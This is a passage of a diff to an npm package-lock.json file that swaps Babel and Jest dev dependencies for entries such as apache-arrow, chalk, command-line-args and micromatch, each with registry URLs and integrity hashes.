"integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", + "node_modules/@types/stack-utils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", + "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "license": "MIT" }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", + "node_modules/@types/yargs": { + "version": "17.0.33", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", + "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "@types/yargs-parser": "*" } }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, + "node_modules/@types/yargs-parser": { + "version": "21.0.0", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", + "dev": true + }, + "node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" + "color-convert": "^2.0.1" }, "engines": { - "node": ">=6.9.0" + "node": ">=8" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, + "node_modules/apache-arrow": { + "version": "19.0.1", + "resolved": "https://registry.npmjs.org/apache-arrow/-/apache-arrow-19.0.1.tgz", + "integrity": "sha512-APmMLzS4qbTivLrPdQXexGM4JRr+0g62QDaobzEvip/FdQIrv2qLy0mD5Qdmw4buydtVJgbFeKR8f59I6PPGDg==", + "license": "Apache-2.0", "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "@swc/helpers": "^0.5.11", + "@types/command-line-args": "^5.2.3", + "@types/command-line-usage": "^5.0.4", + "@types/node": "^20.13.0", + "command-line-args": "^6.0.1", + "command-line-usage": "^7.0.1", + "flatbuffers": "^24.3.25", + "json-bignum": "^0.0.3", + "tslib": "^2.6.2" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "bin": { + "arrow2csv": "bin/arrow2csv.js" } }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node_modules/array-back": { + "version": "6.2.2", + "resolved": "https://registry.npmjs.org/array-back/-/array-back-6.2.2.tgz", + "integrity": "sha512-gUAZ7HPyb4SJczXAMUXMGAvI976JoK3qEx9v1FTmeYuJj0IBiaKttG1ydtGKdkfqWkIkouke7nG8ufGy77+Cvw==", + "license": "MIT", + "engines": { + "node": ">=12.17" } }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", + "node_modules/braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "fill-range": "^7.1.1" }, "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node": ">=8" } }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, + "node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" }, "engines": { - "node": ">=6.9.0" + "node": ">=10" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" } }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, + "node_modules/chalk-template": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/chalk-template/-/chalk-template-0.4.0.tgz", + "integrity": "sha512-/ghrgmhfY8RaSdeo43hNXxpoHAtxdbskUHjPpfqUWGttFgycUhYPGx3YZBCnUCvOa7Doivn1IZec3DEGFoMgLg==", + "license": "MIT", "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" + "chalk": "^4.1.2" }, "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" + "node": ">=12" }, - "engines": { - "node": ">=6.9.0" + "funding": { + "url": "https://github.com/chalk/chalk-template?sponsor=1" } }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, + "node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" + "color-name": "~1.1.4" }, "engines": { - "node": ">=6.9.0" + "node": ">=7.0.0" } }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" }, - "node_modules/@elastic/elasticsearch": { - "version": "8.18.2", - "resolved": "https://registry.npmjs.org/@elastic/elasticsearch/-/elasticsearch-8.18.2.tgz", - "integrity": "sha512-2pOc/hGdxkbaDavfAlnUfjJdVsFRCGqg7fpsWJfJ2UzpgViIyojdViHg8zOCT1J14lAwvDgb9CNETWa3SBZRfw==", - "license": "Apache-2.0", + "node_modules/command-line-args": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/command-line-args/-/command-line-args-6.0.1.tgz", + "integrity": "sha512-Jr3eByUjqyK0qd8W0SGFW1nZwqCaNCtbXjRo2cRJC1OYxWl3MZ5t1US3jq+cO4sPavqgw4l9BMGX0CBe+trepg==", + "license": "MIT", "dependencies": { - "@elastic/transport": "^8.9.6", - "apache-arrow": "18.x - 19.x", - "tslib": "^2.4.0" + "array-back": "^6.2.2", + "find-replace": "^5.0.2", + "lodash.camelcase": "^4.3.0", + "typical": "^7.2.0" }, "engines": { - "node": ">=18" + "node": ">=12.20" + }, + "peerDependencies": { + "@75lb/nature": "latest" + }, + "peerDependenciesMeta": { + "@75lb/nature": { + "optional": true + } } }, - "node_modules/@elastic/transport": { - "version": "8.9.6", - "resolved": "https://registry.npmjs.org/@elastic/transport/-/transport-8.9.6.tgz", - "integrity": "sha512-v71jgmZtgPg2ouXF5KTPxU1a6z7YYc8nazAS7jLySteC/vrShs1OJh6oEEeo5oDc19MYUofV/JV1h5vqJVBXOw==", - "license": "Apache-2.0", + "node_modules/command-line-usage": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/command-line-usage/-/command-line-usage-7.0.3.tgz", + "integrity": "sha512-PqMLy5+YGwhMh1wS04mVG44oqDsgyLRSKJBdOo1bnYhMKBW65gZF1dRp2OZRhiTjgUHljy99qkO7bsctLaw35Q==", + "license": "MIT", "dependencies": { - "@opentelemetry/api": "1.x", - "debug": "^4.4.0", - "hpagent": "^1.2.0", - "ms": "^2.1.3", - "secure-json-parse": "^3.0.1", - "tslib": "^2.8.1", - "undici": "^6.21.1" + "array-back": "^6.2.2", + "chalk-template": "^0.4.0", + "table-layout": "^4.1.0", + "typical": "^7.1.1" }, "engines": { - "node": ">=18" + "node": ">=12.20.0" } }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, + "node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "license": "MIT", "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" + "ms": "^2.1.3" }, "engines": { - "node": ">=8" + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } } }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", + "node_modules/escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", "dev": true, "engines": { "node": ">=8" } }, - "node_modules/@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", + "node_modules/fill-range": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", + "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", "dev": true, + "license": "MIT", "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" + "to-regex-range": "^5.0.1" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=8" } }, - "node_modules/@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, + "node_modules/find-replace": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/find-replace/-/find-replace-5.0.2.tgz", + "integrity": "sha512-Y45BAiE3mz2QsrN2fb5QEtO4qb44NcS7en/0y9PEVsg351HsLeVclP8QPMH79Le9sH3rs5RSwJu99W0WPZO43Q==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=14" }, "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" + "@75lb/nature": "latest" }, "peerDependenciesMeta": { - "node-notifier": { + "@75lb/nature": { "optional": true } } }, - "node_modules/@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } + "node_modules/flatbuffers": { + "version": "24.12.23", + "resolved": "https://registry.npmjs.org/flatbuffers/-/flatbuffers-24.12.23.tgz", + "integrity": "sha512-dLVCAISd5mhls514keQzmEG6QHmUUsNuWsb4tFafIUwvvgDjXhtfAYSKOzt5SWOy+qByV5pbsDZ+Vb7HUOBEdA==", + "license": "Apache-2.0" }, - "node_modules/@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "dependencies": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } + "node_modules/graceful-fs": { + "version": "4.2.11", + "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true }, - "node_modules/@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3" - }, + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=8" } }, - "node_modules/@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, + "node_modules/hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=14" } }, - "node_modules/@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", + "node_modules/is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - }, + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=0.12.0" } }, - "node_modules/@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", + "node_modules/js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } + "license": "MIT" }, - "node_modules/@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, + "node_modules/json-bignum": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/json-bignum/-/json-bignum-0.0.3.tgz", + "integrity": "sha512-2WHyXj3OfHSgNyuzDbSxI1w2jgw5gkWSWhS7Qg4bWXx1nLk3jnbwfUeS0PSba3IzpTUWdHxBieELUzXRjQB2zg==", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=0.8" } }, - "node_modules/@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } + "node_modules/lodash-es": { + "version": "4.17.21", + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "license": "MIT" }, - "node_modules/@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, + "node_modules/lodash.camelcase": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz", + "integrity": "sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA==", + "license": "MIT" + }, + "node_modules/luxon": { + "version": "3.7.1", + "resolved": "https://registry.npmjs.org/luxon/-/luxon-3.7.1.tgz", + "integrity": "sha512-RkRWjA926cTvz5rAb1BqyWkKbbjzCGchDUIKMCUvNi17j6f6j8uHGDV82Aqcqtzd+icoYpELmG3ksgGiFNNcNg==", + "license": "MIT", "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=12" } }, - "node_modules/@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", + "node_modules/micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", "dev": true, + "license": "MIT", "dependencies": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" + "braces": "^3.0.3", + "picomatch": "^2.3.1" }, "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + "node": ">=8.6" } }, - "node_modules/@jest/transform": { - "version": "29.6.1", - 